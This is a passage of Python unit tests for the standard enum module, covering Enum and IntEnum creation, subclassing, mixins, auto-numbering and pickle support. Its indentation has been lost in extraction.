self.assertEqual(len(SummerMonth), 3, SummerMonth)
self.assertEqual(
[SummerMonth.june, SummerMonth.july, SummerMonth.august],
lst,
)
for i, month in enumerate('june july august'.split(), 20):
e = SummerMonth(i)
self.assertEqual(int(e.value), i)
self.assertNotEqual(e, i)
self.assertEqual(e.name, month)
self.assertIn(e, SummerMonth)
self.assertIs(type(e), SummerMonth)
def test_programmatic_function_iterable(self):
SummerMonth = Enum(
'SummerMonth',
(('june', 1), ('july', 2), ('august', 3))
)
lst = list(SummerMonth)
self.assertEqual(len(lst), len(SummerMonth))
self.assertEqual(len(SummerMonth), 3, SummerMonth)
self.assertEqual(
[SummerMonth.june, SummerMonth.july, SummerMonth.august],
lst,
)
for i, month in enumerate('june july august'.split(), 1):
e = SummerMonth(i)
self.assertEqual(int(e.value), i)
self.assertNotEqual(e, i)
self.assertEqual(e.name, month)
self.assertIn(e, SummerMonth)
self.assertIs(type(e), SummerMonth)
def test_programmatic_function_from_dict(self):
SummerMonth = Enum(
'SummerMonth',
OrderedDict((('june', 1), ('july', 2), ('august', 3)))
)
lst = list(SummerMonth)
self.assertEqual(len(lst), len(SummerMonth))
self.assertEqual(len(SummerMonth), 3, SummerMonth)
self.assertEqual(
[SummerMonth.june, SummerMonth.july, SummerMonth.august],
lst,
)
for i, month in enumerate('june july august'.split(), 1):
e = SummerMonth(i)
self.assertEqual(int(e.value), i)
self.assertNotEqual(e, i)
self.assertEqual(e.name, month)
self.assertIn(e, SummerMonth)
self.assertIs(type(e), SummerMonth)
def test_programmatic_function_type(self):
SummerMonth = Enum('SummerMonth', 'june july august', type=int)
lst = list(SummerMonth)
self.assertEqual(len(lst), len(SummerMonth))
self.assertEqual(len(SummerMonth), 3, SummerMonth)
self.assertEqual(
[SummerMonth.june, SummerMonth.july, SummerMonth.august],
lst,
)
for i, month in enumerate('june july august'.split(), 1):
e = SummerMonth(i)
self.assertEqual(e, i)
self.assertEqual(e.name, month)
self.assertIn(e, SummerMonth)
self.assertIs(type(e), SummerMonth)
def test_programmatic_function_type_with_start(self):
SummerMonth = Enum('SummerMonth', 'june july august', type=int, start=30)
lst = list(SummerMonth)
self.assertEqual(len(lst), len(SummerMonth))
self.assertEqual(len(SummerMonth), 3, SummerMonth)
self.assertEqual(
[SummerMonth.june, SummerMonth.july, SummerMonth.august],
lst,
)
for i, month in enumerate('june july august'.split(), 30):
e = SummerMonth(i)
self.assertEqual(e, i)
self.assertEqual(e.name, month)
self.assertIn(e, SummerMonth)
self.assertIs(type(e), SummerMonth)
def test_programmatic_function_type_from_subclass(self):
SummerMonth = IntEnum('SummerMonth', 'june july august')
lst = list(SummerMonth)
self.assertEqual(len(lst), len(SummerMonth))
self.assertEqual(len(SummerMonth), 3, SummerMonth)
self.assertEqual(
[SummerMonth.june, SummerMonth.july, SummerMonth.august],
lst,
)
for i, month in enumerate('june july august'.split(), 1):
e = SummerMonth(i)
self.assertEqual(e, i)
self.assertEqual(e.name, month)
self.assertIn(e, SummerMonth)
self.assertIs(type(e), SummerMonth)
def test_programmatic_function_type_from_subclass_with_start(self):
SummerMonth = IntEnum('SummerMonth', 'june july august', start=40)
lst = list(SummerMonth)
self.assertEqual(len(lst), len(SummerMonth))
self.assertEqual(len(SummerMonth), 3, SummerMonth)
self.assertEqual(
[SummerMonth.june, SummerMonth.july, SummerMonth.august],
lst,
)
for i, month in enumerate('june july august'.split(), 40):
e = SummerMonth(i)
self.assertEqual(e, i)
self.assertEqual(e.name, month)
self.assertIn(e, SummerMonth)
self.assertIs(type(e), SummerMonth)
def test_subclassing(self):
if isinstance(Name, Exception):
raise Name
self.assertEqual(Name.BDFL, 'Guido van Rossum')
self.assertTrue(Name.BDFL, Name('Guido van Rossum'))
self.assertIs(Name.BDFL, getattr(Name, 'BDFL'))
test_pickle_dump_load(self.assertIs, Name.BDFL)
def test_extending(self):
class Color(Enum):
red = 1
green = 2
blue = 3
with self.assertRaises(TypeError):
class MoreColor(Color):
cyan = 4
magenta = 5
yellow = 6
with self.assertRaisesRegex(TypeError, "EvenMoreColor: cannot extend enumeration 'Color'"):
class EvenMoreColor(Color, IntEnum):
chartruese = 7
def test_exclude_methods(self):
class whatever(Enum):
this = 'that'
these = 'those'
def really(self):
return 'no, not %s' % self.value
self.assertIsNot(type(whatever.really), whatever)
self.assertEqual(whatever.this.really(), 'no, not that')
def test_wrong_inheritance_order(self):
with self.assertRaises(TypeError):
class Wrong(Enum, str):
NotHere = 'error before this point'
def test_intenum_transitivity(self):
class number(IntEnum):
one = 1
two = 2
three = 3
class numero(IntEnum):
uno = 1
dos = 2
tres = 3
self.assertEqual(number.one, numero.uno)
self.assertEqual(number.two, numero.dos)
self.assertEqual(number.three, numero.tres)
def test_wrong_enum_in_call(self):
class Monochrome(Enum):
black = 0
white = 1
class Gender(Enum):
male = 0
female = 1
self.assertRaises(ValueError, Monochrome, Gender.male)
def test_wrong_enum_in_mixed_call(self):
class Monochrome(IntEnum):
black = 0
white = 1
class Gender(Enum):
male = 0
female = 1
self.assertRaises(ValueError, Monochrome, Gender.male)
def test_mixed_enum_in_call_1(self):
class Monochrome(IntEnum):
black = 0
white = 1
class Gender(IntEnum):
male = 0
female = 1
self.assertIs(Monochrome(Gender.female), Monochrome.white)
def test_mixed_enum_in_call_2(self):
class Monochrome(Enum):
black = 0
white = 1
class Gender(IntEnum):
male = 0
female = 1
self.assertIs(Monochrome(Gender.male), Monochrome.black)
def test_flufl_enum(self):
class Fluflnum(Enum):
def __int__(self):
return int(self.value)
class MailManOptions(Fluflnum):
option1 = 1
option2 = 2
option3 = 3
self.assertEqual(int(MailManOptions.option1), 1)
def test_introspection(self):
class Number(IntEnum):
one = 100
two = 200
self.assertIs(Number.one._member_type_, int)
self.assertIs(Number._member_type_, int)
class String(str, Enum):
yarn = 'soft'
rope = 'rough'
wire = 'hard'
self.assertIs(String.yarn._member_type_, str)
self.assertIs(String._member_type_, str)
class Plain(Enum):
vanilla = 'white'
one = 1
self.assertIs(Plain.vanilla._member_type_, object)
self.assertIs(Plain._member_type_, object)
def test_no_such_enum_member(self):
class Color(Enum):
red = 1
green = 2
blue = 3
with self.assertRaises(ValueError):
Color(4)
with self.assertRaises(KeyError):
Color['chartreuse']
def test_new_repr(self):
class Color(Enum):
red = 1
green = 2
blue = 3
def __repr__(self):
return "don't you just love shades of %s?" % self.name
self.assertEqual(
repr(Color.blue),
"don't you just love shades of blue?",
)
def test_inherited_repr(self):
class MyEnum(Enum):
def __repr__(self):
return "My name is %s." % self.name
class MyIntEnum(int, MyEnum):
this = 1
that = 2
theother = 3
self.assertEqual(repr(MyIntEnum.that), "My name is that.")
def test_multiple_mixin_mro(self):
class auto_enum(type(Enum)):
def __new__(metacls, cls, bases, classdict):
temp = type(classdict)()
temp._cls_name = cls
names = set(classdict._member_names)
i = 0
for k in classdict._member_names:
v = classdict[k]
if v is Ellipsis:
v = i
else:
i = v
i += 1
temp[k] = v
for k, v in classdict.items():
if k not in names:
temp[k] = v
return super(auto_enum, metacls).__new__(
metacls, cls, bases, temp)
class AutoNumberedEnum(Enum, metaclass=auto_enum):
pass
class AutoIntEnum(IntEnum, metaclass=auto_enum):
pass
class TestAutoNumber(AutoNumberedEnum):
a = ...
b = 3
c = ...
class TestAutoInt(AutoIntEnum):
a = ...
b = 3
c = ...
def test_subclasses_with_getnewargs(self):
class NamedInt(int):
__qualname__ = 'NamedInt' # needed for pickle protocol 4
def __new__(cls, *args):
_args = args
name, *args = args
if len(args) == 0:
raise TypeError("name and value must be specified")
self = int.__new__(cls, *args)
self._intname = name
self._args = _args
return self
def __getnewargs__(self):
return self._args
@property
def __name__(self):
return self._intname
def __repr__(self):
# repr() is updated to include the name and type info
return "{}({!r}, {})".format(
type(self).__name__,
self.__name__,
int.__repr__(self),
)
def __str__(self):
# str() is unchanged, even if it relies on the repr() fallback
base = int
base_str = base.__str__
if base_str.__objclass__ is object:
return base.__repr__(self)
return base_str(self)
# for simplicity, we only define one operator that
# propagates expressions
def __add__(self, other):
temp = int(self) + int( other)
if isinstance(self, NamedInt) and isinstance(other, NamedInt):
return NamedInt(
'({0} + {1})'.format(self.__name__, other.__name__),
temp,
)
else:
return temp
class NEI(NamedInt, Enum):
__qualname__ = 'NEI' # needed for pickle protocol 4
x = ('the-x', 1)
y = ('the-y', 2)
self.assertIs(NEI.__new__, Enum.__new__)
self.assertEqual(repr(NEI.x + NEI.y), "NamedInt('(the-x + the-y)', 3)")
globals()['NamedInt'] = NamedInt
globals()['NEI'] = NEI
NI5 = NamedInt('test', 5)
self.assertEqual(NI5, 5)
test_pickle_dump_load(self.assertEqual, NI5, 5)
self.assertEqual(NEI.y.value, 2)
test_pickle_dump_load(self.assertIs, NEI.y)
test_pickle_dump_load(self.assertIs, NEI)
def test_subclasses_with_getnewargs_ex(self):
class NamedInt(int):
__qualname__ = 'NamedInt' # needed for pickle protocol 4
def __new__(cls, *args):
_args = args
name, *args = args
if len(args) == 0:
raise TypeError("name and value must be specified")
self = int.__new__(cls, *args)
self._intname = name
self._args = _args
return self
def __getnewargs_ex__(self):
return self._args, {}
@property
def __name__(self):
return self._intname
def __repr__(self):
# repr() is updated to include the name and type info
return "{}({!r}, {})".format(
type(self).__name__,
self.__name__,
int.__repr__(self),
)
def __str__(self):
# str() is unchanged, even if it relies on the repr() fallback
base = int
base_str = base.__str__
if base_str.__objclass__ is object:
return base.__repr__(self)
return base_str(self)
# for simplicity, we only define one operator that
# propagates expressions
def __add__(self, other):
temp = int(self) + int( other)
if isinstance(self, NamedInt) and isinstance(other, NamedInt):
return NamedInt(
'({0} + {1})'.format(self.__name__, other.__name__),
temp,
)
else:
return temp
class NEI(NamedInt, Enum):
__qualname__ = 'NEI' # needed for pickle protocol 4
x = ('the-x', 1)
y = ('the-y', 2)
self.assertIs(NEI.__new__, Enum.__new__)
self.assertEqual(repr(NEI.x + NEI.y), "NamedInt('(the-x + the-y)', 3)")
globals()['NamedInt'] = NamedInt
globals()['NEI'] = NEI
NI5 = NamedInt('test', 5)
self.assertEqual(NI5, 5)
test_pickle_dump_load(self.assertEqual, NI5, 5)
self.assertEqual(NEI.y.value, 2)
test_pickle_dump_load(self.assertIs, NEI.y)
test_pickle_dump_load(self.assertIs, NEI)
def test_subclasses_with_reduce(self):
class NamedInt(int):
__qualname__ = 'NamedInt' # needed for pickle protocol 4
def __new__(cls, *args):
_args = args
name, *args = args
if len(args) == 0:
raise TypeError("name and value must be specified")
self = int.__new__(cls, *args)
self._intname = name
self._args = _args
return self
def __reduce__(self):
return self.__class__, self._args
@property
def __name__(self):
return self._intname
def __repr__(self):
# repr() is updated to include the name and type info
return "{}({!r}, {})".format(
type(self).__name__,
self.__name__,
int.__repr__(self),
)
def __str__(self):
# str() is unchanged, even if it relies on the repr() fallback
base = int
base_str = base.__str__
if base_str.__objclass__ is object:
return base.__repr__(self)
return base_str(self)
# for simplicity, we only define one operator that
# propagates expressions
def __add__(self, other):
temp = int(self) + int( other)
if isinstance(self, NamedInt) and isinstance(other, NamedInt):
return NamedInt(
'({0} + {1})'.format(self.__name__, other.__name__),
temp,
)
else:
return temp
class NEI(NamedInt, Enum):
__qualname__ = 'NEI' # needed for pickle protocol 4
x = ('the-x', 1)
y = ('the-y', 2)
self.assertIs(NEI.__new__, Enum.__new__)
self.assertEqual(repr(NEI.x + NEI.y), "NamedInt('(the-x + the-y)', 3)")
globals()['NamedInt'] = NamedInt
globals()['NEI'] = NEI
NI5 = NamedInt('test', 5)
self.assertEqual(NI5, 5)
test_pickle_dump_load(self.assertEqual, NI5, 5)
self.assertEqual(NEI.y.value, 2)
test_pickle_dump_load(self.assertIs, NEI.y)
test_pickle_dump_load(self.assertIs, NEI)
def test_subclasses_with_reduce_ex(self):
class NamedInt(int):
__qualname__ = 'NamedInt' # needed for pickle protocol 4
def __new__(cls, *args):
_args = args
name, *args = args
if len(args) == 0:
raise TypeError("name and value must be specified")
self = int.__new__(cls, *args)
self._intname = name
self._args = _args
return self
def __reduce_ex__(self, proto):
return self.__class__, self._args
@property
def __name__(self):
return self._intname
def __repr__(self):
# repr() is updated to include the name and type info
return "{}({!r}, {})".format(
type(self).__name__,
self.__name__,
int.__repr__(self),
)
def __str__(self):
# str() is unchanged, even if it relies on the repr() fallback
base = int
base_str = base.__str__
if base_str.__objclass__ is object:
return base.__repr__(self)
return base_str(self)
# for simplicity, we only define one operator that
# propagates expressions
def __add__(self, other):
temp = int(self) + int( other)
if isinstance(self, NamedInt) and isinstance(other, NamedInt):
return NamedInt(
'({0} + {1})'.format(self.__name__, other.__name__),
temp,
)
else:
return temp
class NEI(NamedInt, Enum):
__qualname__ = 'NEI' # needed for pickle protocol 4
x = ('the-x', 1)
y = ('the-y', 2)
self.assertIs(NEI.__new__, Enum.__new__)
self.assertEqual(repr(NEI.x + NEI.y), "NamedInt('(the-x + the-y)', 3)")
globals()['NamedInt'] = NamedInt
globals()['NEI'] = NEI
NI5 = NamedInt('test', 5)
self.assertEqual(NI5, 5)
test_pickle_dump_load(self.assertEqual, NI5, 5)
self.assertEqual(NEI.y.value, 2)
test_pickle_dump_load(self.assertIs, NEI.y)
test_pickle_dump_load(self.assertIs, NEI)
def test_subclasses_without_direct_pickle_support(self):
class NamedInt(int):
__qualname__ = 'NamedInt'
def __new__(cls, *args):
_args = args
name, *args = args
if len(args) == 0:
raise TypeError("name and value must be specified")
self = int.__new__(cls, *args)
self._intname = name
self._args = _args
return self
@property
def __name__(self):
return self._intname
def __repr__(self):
# repr() is updated to include the name and type info
return "{}({!r}, {})".format(
type(self).__name__,
self.__name__,
int.__repr__(self),
)
def __str__(self):
# str() is unchanged, even if it relies on the repr() fallback
base = int
base_str = base.__str__
if base_str.__objclass__ is object:
return base.__repr__(self)
return base_str(self)
# for simplicity, we only define one operator that
# propagates expressions
def __add__(self, other):
temp = int(self) + int( other)
if isinstance(self, NamedInt) and isinstance(other, NamedInt):
return NamedInt(
'({0} + {1})'.format(self.__name__, other.__name__),
temp )
else:
return temp
class NEI(NamedInt, Enum):
__qualname__ = 'NEI'
x = ('the-x', 1)
y = ('the-y', 2)
self.assertIs(NEI.__new__, Enum.__new__)
self.assertEqual(repr(NEI.x + NEI.y), "NamedInt('(the-x + the-y)', 3)")
globals()['NamedInt'] = NamedInt
globals()['NEI'] = NEI
NI5 = NamedInt('test', 5)
self.assertEqual(NI5, 5)
self.assertEqual(NEI.y.value, 2)
test_pickle_exception(self.assertRaises, TypeError, NEI.x)
test_pickle_exception(self.assertRaises, PicklingError, NEI)
def test_subclasses_without_direct_pickle_support_using_name(self):
class NamedInt(int):
__qualname__ = 'NamedInt'
def __new__(cls, *args):
_args = args
name, *args = args
if len(args) == 0:
raise TypeError("name and value must be specified")
self = int.__new__(cls, *args)
self._intname = name
self._args = _args
return self
@property
def __name__(self):
return self._intname
def __repr__(self):
# repr() is updated to include the name and type info
return "{}({!r}, {})".format(
type(self).__name__,
self.__name__,
int.__repr__(self),
)
def __str__(self):
# str() is unchanged, even if it relies on the repr() fallback
base = int
base_str = base.__str__
if base_str.__objclass__ is object:
return base.__repr__(self)
return base_str(self)
# for simplicity, we only define one operator that
# propagates expressions
def __add__(self, other):
temp = int(self) + int( other)
if isinstance(self, NamedInt) and isinstance(other, NamedInt):
return NamedInt(
'({0} + {1})'.format(self.__name__, other.__name__),
temp,
)
else:
return temp
class NEI(NamedInt, Enum):
__qualname__ = 'NEI'
x = ('the-x', 1)
y = ('the-y', 2)
def __reduce_ex__(self, proto):
return getattr, (self.__class__, self._name_)
self.assertIs(NEI.__new__, Enum.__new__)
self.assertEqual(repr(NEI.x + NEI.y), "NamedInt('(the-x + the-y)', 3)")
globals()['NamedInt'] = NamedInt
globals()['NEI'] = NEI
NI5 = NamedInt('test', 5)
self.assertEqual(NI5, 5)
self.assertEqual(NEI.y.value, 2)
test_pickle_dump_load(self.assertIs, NEI.y)
test_pickle_dump_load(self.assertIs, NEI)
def test_tuple_subclass(self):
class SomeTuple(tuple, Enum):
__qualname__ = 'SomeTuple' # needed for pickle protocol 4
first = (1, 'for the money')
second = (2, 'for the show')
third = (3, 'for the music')
self.assertIs(type(SomeTuple.first), SomeTuple)
self.assertIsInstance(SomeTuple.second, tuple)
self.assertEqual(SomeTuple.third, (3, 'for the music'))
globals()['SomeTuple'] = SomeTuple
test_pickle_dump_load(self.assertIs, SomeTuple.first)
def test_duplicate_values_give_unique_enum_items(self):
class AutoNumber(Enum):
first = ()
second = ()
third = ()
def __new__(cls):
value = len(cls.__members__) + 1
obj = object.__new__(cls)
obj._value_ = value
return obj
def __int__(self):
return int(self._value_)
self.assertEqual(
list(AutoNumber),
[AutoNumber.first, AutoNumber.second, AutoNumber.third],
)
self.assertEqual(int(AutoNumber.second), 2)
self.assertEqual(AutoNumber.third.value, 3)
self.assertIs(AutoNumber(1), AutoNumber.first)
def test_inherited_new_from_enhanced_enum(self):
class AutoNumber(Enum):
def __new__(cls):
value = len(cls.__members__) + 1
obj = object.__new__(cls)
obj._value_ = value
return obj
def __int__(self):
return int(self._value_)
class Color(AutoNumber):
red = ()
green = ()
blue = ()
self.assertEqual(list(Color), [Color.red, Color.green, Color.blue])
self.assertEqual(list(map(int, Color)), [1, 2, 3])
def test_inherited_new_from_mixed_enum(self):
class AutoNumber(IntEnum):
def __new__(cls):
value = len(cls.__members__) + 1
obj = int.__new__(cls, value)
obj._value_ = value
return obj
class Color(AutoNumber):
red = ()
green = ()
blue = ()
self.assertEqual(list(Color), [Color.red, Color.green, Color.blue])
self.assertEqual(list(map(int, Color)), [1, 2, 3])
def test_equality(self):
class OrdinaryEnum(Enum):
a = 1
self.assertEqual(ALWAYS_EQ, OrdinaryEnum.a)
self.assertEqual(OrdinaryEnum.a, ALWAYS_EQ)
def test_ordered_mixin(self):
class OrderedEnum(Enum):
def __ge__(self, other):
if self.__class__ is other.__class__:
return self._value_ >= other._value_
return NotImplemented
def __gt__(self, other):
if self.__class__ is other.__class__:
return self._value_ > other._value_
return NotImplemented
def __le__(self, other):
if self.__class__ is other.__class__:
return self._value_ <= other._value_
return NotImplemented
def __lt__(self, other):
if self.__class__ is other.__class__:
return self._value_ < other._value_
return NotImplemented
class Grade(OrderedEnum):
A = 5
B = 4
C = 3
D = 2
F = 1
self.assertGreater(Grade.A, Grade.B)
self.assertLessEqual(Grade.F, Grade.C)
self.assertLess(Grade.D, Grade.A)
self.assertGreaterEqual(Grade.B, Grade.B)
self.assertEqual(Grade.B, Grade.B)
self.assertNotEqual(Grade.C, Grade.D)
def test_extending2(self):
class Shade(Enum):
def shade(self):
print(self.name)
class Color(Shade):
red = 1
green = 2
blue = 3
with self.assertRaises(TypeError):
class MoreColor(Color):
cyan = 4
magenta = 5
yellow = 6
def test_extending3(self):
class Shade(Enum):
def shade(self):
return self.name
class Color(Shade):
def hex(self):
return '%s hexlified!' % self.value
class MoreColor(Color):
cyan = 4
magenta = 5
yellow = 6
self.assertEqual(MoreColor.magenta.hex(), '5 hexlified!')
def test_subclass_duplicate_name(self):
class Base(Enum):
def test(self):
pass
class Test(Base):
test = 1
self.assertIs(type(Test.test), Test)
def test_subclass_duplicate_name_dynamic(self):
from types import DynamicClassAttribute
class Base(Enum):
@DynamicClassAttribute
def test(self):
return 'dynamic'
class Test(Base):
test = 1
self.assertEqual(Test.test.test, 'dynamic')
class Base2(Enum):
@enum.property
def flash(self):
return 'flashy dynamic'
class Test(Base2):
flash = 1
self.assertEqual(Test.flash.flash, 'flashy dynamic')
def test_no_duplicates(self):
class UniqueEnum(Enum):
def __init__(self, *args):
cls = self.__class__
if any(self.value == e.value for e in cls):
a = self.name
e = cls(self.value).name
raise ValueError(
"aliases not allowed in UniqueEnum: %r --> %r"
% (a, e)
)
class Color(UniqueEnum):
red = 1
green = 2
blue = 3
with self.assertRaises(ValueError):
class Color(UniqueEnum):
red = 1
green = 2
blue = 3
grene = 2
def test_init(self):
class Planet(Enum):
MERCURY = (3.303e+23, 2.4397e6)
VENUS = (4.869e+24, 6.0518e6)
EARTH = (5.976e+24, 6.37814e6)
MARS = (6.421e+23, 3.3972e6)
JUPITER = (1.9e+27, 7.1492e7)
SATURN = (5.688e+26, 6.0268e7)
URANUS = (8.686e+25, 2.5559e7)
NEPTUNE = (1.024e+26, 2.4746e7)
def __init__(self, mass, radius):
self.mass = mass # in kilograms
self.radius = radius # in meters
@property
def surface_gravity(self):
# universal gravitational constant (m3 kg-1 s-2)
G = 6.67300E-11
return G * self.mass / (self.radius * self.radius)
self.assertEqual(round(Planet.EARTH.surface_gravity, 2), 9.80)
self.assertEqual(Planet.EARTH.value, (5.976e+24, 6.37814e6))
def test_ignore(self):
class Period(timedelta, Enum):
'''
different lengths of time
'''
def __new__(cls, value, period):
obj = timedelta.__new__(cls, value)
obj._value_ = value
obj.period = period
return obj
_ignore_ = 'Period i'
Period = vars()
for i in range(13):
Period['month_%d' % i] = i*30, 'month'
for i in range(53):
Period['week_%d' % i] = i*7, 'week'
for i in range(32):
Period['day_%d' % i] = i, 'day'
OneDay = day_1
OneWeek = week_1
OneMonth = month_1
self.assertFalse(hasattr(Period, '_ignore_'))
self.assertFalse(hasattr(Period, 'Period'))
self.assertFalse(hasattr(Period, 'i'))
self.assertTrue(isinstance(Period.day_1, timedelta))
self.assertTrue(Period.month_1 is Period.day_30)
self.assertTrue(Period.week_4 is Period.day_28)
def test_nonhash_value(self):
class AutoNumberInAList(Enum):
def __new__(cls):
value = [len(cls.__members__) + 1]
obj = object.__new__(cls)
obj._value_ = value
return obj
class ColorInAList(AutoNumberInAList):
red = ()
green = ()
blue = ()
self.assertEqual(list(ColorInAList), [ColorInAList.red, ColorInAList.green, ColorInAList.blue])
for enum, value in zip(ColorInAList, range(3)):
value += 1
self.assertEqual(enum.value, [value])
self.assertIs(ColorInAList([value]), enum)
def test_conflicting_types_resolved_in_new(self):
class LabelledIntEnum(int, Enum):
def __new__(cls, *args):
value, label = args
obj = int.__new__(cls, value)
obj.label = label
obj._value_ = value
return obj
class LabelledList(LabelledIntEnum):
unprocessed = (1, "Unprocessed")
payment_complete = (2, "Payment Complete")
self.assertEqual(list(LabelledList), [LabelledList.unprocessed, LabelledList.payment_complete])
self.assertEqual(LabelledList.unprocessed, 1)
self.assertEqual(LabelledList(1), LabelledList.unprocessed)
def test_auto_number(self):
class Color(Enum):
red = auto()
blue = auto()
green = auto()
self.assertEqual(list(Color), [Color.red, Color.blue, Color.green])
self.assertEqual(Color.red.value, 1)
self.assertEqual(Color.blue.value, 2)
self.assertEqual(Color.green.value, 3)
def test_auto_name(self):
class Color(Enum):
def _generate_next_value_(name, start, count, last):
return name
red = auto()
blue = auto()
green = auto()
self.assertEqual(list(Color), [Color.red, Color.blue, Color.green])
self.assertEqual(Color.red.value, 'red')
self.assertEqual(Color.blue.value, 'blue')
self.assertEqual(Color.green.value, 'green')
def test_auto_name_inherit(self):
class AutoNameEnum(Enum):
def _generate_next_value_(name, start, count, last):
return name
class Color(AutoNameEnum):
red = auto()
blue = auto()
green = auto()
self.assertEqual(list(Color), [Color.red, Color.blue, Color.green])
self.assertEqual(Color.red.value, 'red')
self.assertEqual(Color.blue.value, 'blue')
self.assertEqual(Color.green.value, 'green')
def test_auto_garbage(self):
class Color(Enum):
red = 'red'
blue = auto()
self.assertEqual(Color.blue.value, 1)
def test_auto_garbage_corrected(self):
class Color(Enum):
red = 'red'
blue = 2
green = auto()
self.assertEqual(list(Color), [Color.red, Color.blue, Color.green])
self.assertEqual(Color.red.value, 'red')
self.assertEqual(Color.blue.value, 2)
self.assertEqual(Color.green.value, 3)
def test_auto_order(self):
with self.assertRaises(TypeError):
class Color(Enum):
red = auto()
green = auto()
blue = auto()
def _generate_next_value_(name, start, count, last):
return name
def test_auto_order_wierd(self):
weird_auto = auto()
weird_auto.value = 'pathological case'
class Color(Enum):
red = weird_auto
def _generate_next_value_(name, start, count, last):
return name
blue = auto()
self.assertEqual(list(Color), [Color.red, Color.blue])
self.assertEqual(Color.red.value, 'pathological case')
self.assertEqual(Color.blue.value, 'blue')
def test_duplicate_auto(self):
class Dupes(Enum):
first = primero = auto()
second = auto()
third = auto()
self.assertEqual([Dupes.first, Dupes.second, Dupes.third], list(Dupes))
def test_default_missing(self):
class Color(Enum):
RED = 1
GREEN = 2
BLUE = 3
try:
Color(7)
except ValueError as exc:
self.assertTrue(exc.__context__ is None)
else:
raise Exception('Exception not raised.')
def test_missing(self):
class Color(Enum):
red = 1
green = 2
blue = 3
@classmethod
def _missing_(cls, item):
if item == 'three':
return cls.blue
elif item == 'bad return':
# trigger internal error
return 5
elif item == 'error out':
raise ZeroDivisionError
else:
# trigger not found
return None
self.assertIs(Color('three'), Color.blue)
try:
Color(7)
except ValueError as exc:
self.assertTrue(exc.__context__ is None)
else:
raise Exception('Exception not raised.')
try:
Color('bad return')
except TypeError as exc:
self.assertTrue(isinstance(exc.__context__, ValueError))
else:
raise Exception('Exception not raised.')
try:
Color('error out')
except ZeroDivisionError as exc:
self.assertTrue(isinstance(exc.__context__, ValueError))
else:
raise Exception('Exception not raised.')
def test_missing_exceptions_reset(self):
import weakref
#
class TestEnum(enum.Enum):
VAL1 = 'val1'
VAL2 = 'val2'
#
class Class1:
def __init__(self):
# Gracefully handle an exception of our own making
try:
raise ValueError()
except ValueError:
pass
#
class Class2:
def __init__(self):
# Gracefully handle an exception of Enum's making
try:
TestEnum('invalid_value')
except ValueError:
pass
# No strong refs here so these are free to die.
class_1_ref = weakref.ref(Class1())
class_2_ref = weakref.ref(Class2())
#
# The exception raised by Enum creates a reference loop and thus
# Class2 instances will stick around until the next gargage collection
# cycle, unlike Class1.
self.assertIs(class_1_ref(), None)
self.assertIs(class_2_ref(), None)
def test_multiple_mixin(self):
class MaxMixin:
@classproperty
def MAX(cls):
max = len(cls)
cls.MAX = max
return max
class StrMixin:
def __str__(self):
return self._name_.lower()
class SomeEnum(Enum):
def behavior(self):
return 'booyah'
class AnotherEnum(Enum):
def behavior(self):
return 'nuhuh!'
def social(self):
return "what's up?"
class Color(MaxMixin, Enum):
RED = auto()
GREEN = auto()
BLUE = auto()
self.assertEqual(Color.RED.value, 1)
self.assertEqual(Color.GREEN.value, 2)
self.assertEqual(Color.BLUE.value, 3)
self.assertEqual(Color.MAX, 3)
self.assertEqual(str(Color.BLUE), 'BLUE')
class Color(MaxMixin, StrMixin, Enum):
RED = auto()
GREEN = auto()
BLUE = auto()
self.assertEqual(Color.RED.value, 1)
self.assertEqual(Color.GREEN.value, 2)
self.assertEqual(Color.BLUE.value, 3)
self.assertEqual(Color.MAX, 3)
self.assertEqual(str(Color.BLUE), 'blue')
class Color(StrMixin, MaxMixin, Enum):
RED = auto()
GREEN = auto()
BLUE = auto()
self.assertEqual(Color.RED.value, 1)
self.assertEqual(Color.GREEN.value, 2)
self.assertEqual(Color.BLUE.value, 3)
self.assertEqual(Color.MAX, 3)
self.assertEqual(str(Color.BLUE), 'blue')
class CoolColor(StrMixin, SomeEnum, Enum):
RED = auto()
GREEN = auto()
BLUE = auto()
self.assertEqual(CoolColor.RED.value, 1)
self.assertEqual(CoolColor.GREEN.value, 2)
self.assertEqual(CoolColor.BLUE.value, 3)
self.assertEqual(str(CoolColor.BLUE), 'blue')
self.assertEqual(CoolColor.RED.behavior(), 'booyah')
class CoolerColor(StrMixin, AnotherEnum, Enum):
RED = auto()
GREEN = auto()
BLUE = auto()
self.assertEqual(CoolerColor.RED.value, 1)
self.assertEqual(CoolerColor.GREEN.value, 2)
self.assertEqual(CoolerColor.BLUE.value, 3)
self.assertEqual(str(CoolerColor.BLUE), 'blue')
self.assertEqual(CoolerColor.RED.behavior(), 'nuhuh!')
self.assertEqual(CoolerColor.RED.social(), "what's up?")
class CoolestColor(StrMixin, SomeEnum, AnotherEnum):
RED = auto()
GREEN = auto()
BLUE = auto()
self.assertEqual(CoolestColor.RED.value, 1)
self.assertEqual(CoolestColor.GREEN.value, 2)
self.assertEqual(CoolestColor.BLUE.value, 3)
self.assertEqual(str(CoolestColor.BLUE), 'blue')
self.assertEqual(CoolestColor.RED.behavior(), 'booyah')
self.assertEqual(CoolestColor.RED.social(), "what's up?")
class ConfusedColor(StrMixin, AnotherEnum, SomeEnum):
RED = auto()
GREEN = auto()
BLUE = auto()
self.assertEqual(ConfusedColor.RED.value, 1)
self.assertEqual(ConfusedColor.GREEN.value, 2)
self.assertEqual(ConfusedColor.BLUE.value, 3)
self.assertEqual(str(ConfusedColor.BLUE), 'blue')
self.assertEqual(ConfusedColor.RED.behavior(), 'nuhuh!')
self.assertEqual(ConfusedColor.RED.social(), "what's up?")
class ReformedColor(StrMixin, IntEnum, SomeEnum, AnotherEnum):
RED = auto()
GREEN = auto()
BLUE = auto()
self.assertEqual(ReformedColor.RED.value, 1)
self.assertEqual(ReformedColor.GREEN.value, 2)
self.assertEqual(ReformedColor.BLUE.value, 3)
self.assertEqual(str(ReformedColor.BLUE), 'blue')
self.assertEqual(ReformedColor.RED.behavior(), 'booyah')
self.assertEqual(ConfusedColor.RED.social(), "what's up?")
self.assertTrue(issubclass(ReformedColor, int))
def test_multiple_inherited_mixin(self):
@unique
class Decision1(StrEnum):
REVERT = "REVERT"
REVERT_ALL = "REVERT_ALL"
RETRY = "RETRY"
class MyEnum(StrEnum):
pass
@unique
class Decision2(MyEnum):
REVERT = "REVERT"
REVERT_ALL = "REVERT_ALL"
RETRY = "RETRY"
def test_multiple_mixin_inherited(self):
class MyInt(int):
def __new__(cls, value):
return super().__new__(cls, value)
class HexMixin:
def __repr__(self):
return hex(self)
class MyIntEnum(HexMixin, MyInt, enum.Enum):
pass
class Foo(MyIntEnum):
TEST = 1
self.assertTrue(isinstance(Foo.TEST, MyInt))
